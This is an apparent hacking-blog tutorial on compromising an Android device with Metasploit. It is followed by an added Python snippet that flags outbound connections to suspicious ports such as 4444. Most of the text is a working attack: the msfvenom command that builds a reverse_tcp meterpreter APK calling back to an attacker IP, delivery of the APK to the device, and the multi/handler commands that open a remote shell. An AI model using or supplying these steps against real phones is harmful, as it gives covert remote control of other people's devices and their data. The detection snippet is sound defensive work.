Good morning/evening/night my fellow hackers, today’s lesson is on Metasploit and how we can hack Android with a Metasploit payload. So let’s get started!!
As always, this post is for educational purposes and should not be used on your friends or enemies, that’s illegal.
Firstly we are using an Android emulator for this class. You can download the APK yourself from here and try this cool hack.
Once you have that set up, we then need an attacking machine with Metasploit built in; Kali Linux is our go-to attacking machine.
Next we will generate our android payload and make it into an APK so that it is executable, so open up a shell and on the command line type
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=4444 R > androidhack.apk
In the command above we are asking the tool msfvenom to use the payload of reverse TCP, use our attacking IP as the LHOST and 4444 as the LPORT we will use to listen on.
Your IP may differ from ours, you can check with the ifconfig command.
Before we do anything with our new file, we will need to give it permissions to be able to execute, type
chmod 755 androidhack.apk
Once you enter that command the color of the file should turn green.
That’s the payload generated as an APK file that can be installed by any Android device. Next we will need to infect the device.
So let’s install the APK on the Android emulator.
To do that we just need to visit our attacking machine IP, so open a browser on the device and go to 192.168.1.139.
Let’s click on the file and install it on the device, once the app is installed you will be informed, but don’t open it just yet.
Now we need to generate an exploit on our attacking machine, we will do this with Metasploit. So open up a new tab or shell and type msfconsole.
Once the Metasploit console is open we can now generate the exploit. On the command line type
use exploit/multi/handler
Next we need to set the payload for a reverse TCP connection with the app on the Android device. Type
set PAYLOAD android/meterpreter/reverse_tcp
Perfect, now we set up our attacking machine's IP as the LHOST again, so type
set LHOST 192.168.1.139
A show options command will tell us that everything is set up correctly.
All that’s left to do now is exploit! Type
exploit
Now let’s open the APK file on the Android device, when we click on the Open button we should get a reverse TCP shell from the Android device to our meterpreter shell.
Beauty, it worked!! Just to confirm we can type the command sysinfo.
And as we can see we have managed to hack the device.
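Seen from the device owner's side, the session above is just an outbound TCP connection from the phone to 192.168.1.139 on port 4444. The check below is an added example, not part of the original walkthrough: it scans netstat-style output for active connections to ports outside an allow-list. The sample lines, the device address 192.168.1.50, the allow-list and the function names are all constructed for illustration.

```python
import ipaddress

# Constructed sample of `netstat -tn` style output from a test device (not from the post).
SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.1.50:48112      142.250.74.78:443       ESTABLISHED
tcp        0      0 192.168.1.50:39874      192.168.1.139:4444      ESTABLISHED
tcp6       0      0 ::ffff:192.168.1.50:40210 ::ffff:192.168.1.139:4444 SYN_SENT
tcp        0      0 192.168.1.50:51234      192.168.1.139:80        TIME_WAIT
tcp6       0      0 :::5555                 :::*                    LISTEN
"""

# Assumption: remote ports this device is expected to use; tune per environment.
ALLOWED_REMOTE_PORTS = {53, 80, 443, 5228}
ACTIVE_STATES = {"ESTABLISHED", "SYN_SENT"}


def split_endpoint(endpoint):
    """Split 'host:port' (IPv4 or IPv6 form) into (ip_address, port), or None."""
    host, _, port = endpoint.rpartition(":")
    if not port.isdigit():
        return None  # e.g. ':::*' on listening sockets
    try:
        addr = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return None
    # Normalise IPv4-mapped IPv6 (::ffff:a.b.c.d) so both forms compare equal.
    if addr.version == 6 and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return addr, int(port)


def suspicious_connections(netstat_text, allowed_ports=ALLOWED_REMOTE_PORTS):
    """Return active outbound TCP connections to ports outside the allow-list."""
    findings = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue  # header line or non-TCP socket
        state, remote = fields[5], split_endpoint(fields[4])
        if remote is None or state not in ACTIVE_STATES:
            continue  # listening, closing or unparsable entries
        addr, port = remote
        if port not in allowed_ports:
            note = "Metasploit default LPORT" if port == 4444 else "unexpected port"
            findings.append({"remote": str(addr), "port": port, "state": state,
                             "private": addr.is_private, "note": note})
    return findings
```

Calling suspicious_connections(SAMPLE) returns the two connections to 192.168.1.139:4444 and ignores the HTTPS session, the closed port 80 connection and the listening socket.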
QuBits 2019-09-04